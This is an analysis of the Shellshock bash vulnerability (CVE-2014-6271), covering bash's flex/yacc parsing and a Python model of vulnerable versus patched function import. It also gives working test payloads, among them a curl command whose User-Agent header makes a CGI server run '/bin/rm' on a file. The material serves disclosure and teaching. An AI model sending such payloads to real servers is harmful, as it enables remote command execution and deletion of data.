myhack58 / Anonymous / MYHACK58:62201454165
History: Sep 28, 2014 - 12:00 a.m.

Analysis of the Shellshock vulnerability (CVE-2014-6271) from the parsing perspective - vulnerability warning - the black bar safety net

2014-09-28 00:00:00
Anonymous
www.myhack58.com

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.976 High
Percentile: 100.0%

Author: yaoxi

Documentation
This time we combine the analysis of the PoC with Bash's syntax rules, approaching from a different angle to help everyone understand Bash and the Shellshock vulnerability better.

Vulnerability description
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>
CVE-2014-6271 is a vulnerability in the shell discovered by Stéphane Chazelas (France). It is triggered when extra strings are appended after a function definition held in the value of an environment variable; an attacker can exploit it to change or bypass environment restrictions and execute shell commands.
This vulnerability can affect OpenSSH sshd when the ForceCommand feature is used, Apache servers using mod_cgi or mod_cgid, DHCP clients, and other applications that use bash as an interpreter.

Vulnerability testing
1. Local test

```shell
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
```

Prints:

```
vulnerable
this is a test
```

2. HTTP test via CGI
Construct poc.cgi:
![](/Article/UploadPic/2014-9/201492821140200.png)
Make sure there is a test.file in the local www directory.

```shell
curl http://127.0.0.1/poc.cgi -A 'x=() { :; }; /bin/rm /www/test.file'
```

test.file has been deleted:

```shell
curl http://192.168.0.1/test.file
```

```html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>

</body>
</html>
```

Vulnerability analysis
In the test above, the User-Agent input "x=() { :; }; /bin/rm /www/test.file" is parsed by bash's syntax analysis into a function definition followed by a command. The command is then executed inside the parse_and_execute function, so test.file is removed illegitimately.
The analysis below mainly looks at how bash's parser turns the character input "HTTP_USER_AGENT() { :; };\n/bin/rm /www/test.file" into a function definition plus a command. Understanding bash's parsing process helps us understand the vulnerability details better.

1. Bash's lexical and syntax analysis is implemented with flex and yacc. If you are not familiar with flex and yacc, look up the related material yourself; here is a brief introduction:
Flex, the lexical analyzer, extracts the various words from the data stream and forms tokens for the parser to use. Yacc, the grammar analyzer, performs shift and reduce operations on the grammar symbols according to certain rules, finally reducing them to the target grammar symbol S.

2. Bash's lexical tokens can be found in y.tab.c, in arrays such as word_token_alist and other_token_alist. Bash's grammar is defined in the parse.y file.
Analysis of the input data "HTTP_USER_AGENT() \n{\n :;\n };/bin/rm /www/test.file":
![](/Article/UploadPic/2014-9/201492821140940.png)
When the parser reduces to the function_def state it creates the function definition through the following interface:

```c
{ $$ = make_function_def ($1, $5, function_dstart, function_bstart); }
```

Here $1 = HTTP_USER_AGENT, $5 is the function body, function_dstart is the line where the function definition starts,
and function_bstart is the line where the function body starts.
/bin/rm /www/test.file is in the simple_command state; at that point a command is created by calling the interface:

```c
COMMAND *make_simple_command (element, command)
```

3. In parse_and_execute, the central parsing work is done by yyparse, which is called from parse_command.
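The import logic the two tests above exercise, modelled as an added example (not bash's own code): bash hands any environment value starting with "() {" to parse_and_execute, which keeps parsing past the closing brace. The toy parser below shows the pre-patch behaviour beside that of the first upstream fix, which only accepts a lone function definition; brace matching is simplified and quoting is not handled.

```python
# Added example (not bash's own code): a model of the environment-function
# import that CVE-2014-6271 abused.  Bash imports any variable whose value
# starts with "() {" by handing the WHOLE value to parse_and_execute(), so a
# command after the closing brace was parsed and run at shell startup.
# Brace matching here is a toy: quotes and escapes are not modelled.
import re

PREFIX_RE = re.compile(r"^\(\)\s*\{")


def split_function_import(value):
    """Return (body, trailing) for a value that looks like an exported
    function, or None if it does not start with "() {" or is unterminated.
    body is the text inside the outermost braces; trailing is everything
    after the closing brace (what the vulnerable import kept parsing)."""
    m = PREFIX_RE.match(value)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(value) and depth:
        if value[i] == "{":
            depth += 1
        elif value[i] == "}":
            depth -= 1
        i += 1
    if depth:
        return None
    return value[m.end():i - 1], value[i:]


def vulnerable_import(name, value):
    """Pre-patch behaviour: prefix check only; the definition AND any
    trailing command are returned in the order bash would execute them."""
    parts = split_function_import(value)
    if parts is None:
        return []
    body, trailing = parts
    cmds = ["%s() {%s}" % (name, body)]
    trailing = trailing.lstrip(" \t\n;").strip()
    if trailing:
        cmds.append(trailing)  # the injected command, run at import time
    return cmds


def patched_import(name, value):
    """Post-patch behaviour: accept only a lone function definition."""
    parts = split_function_import(value)
    if parts is None or parts[1].strip():
        return []
    return ["%s() {%s}" % (name, parts[0])]
```

Feeding the page's own User-Agent payload through both functions shows the difference: the vulnerable path yields the definition plus "/bin/rm /www/test.file", the patched path yields nothing.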

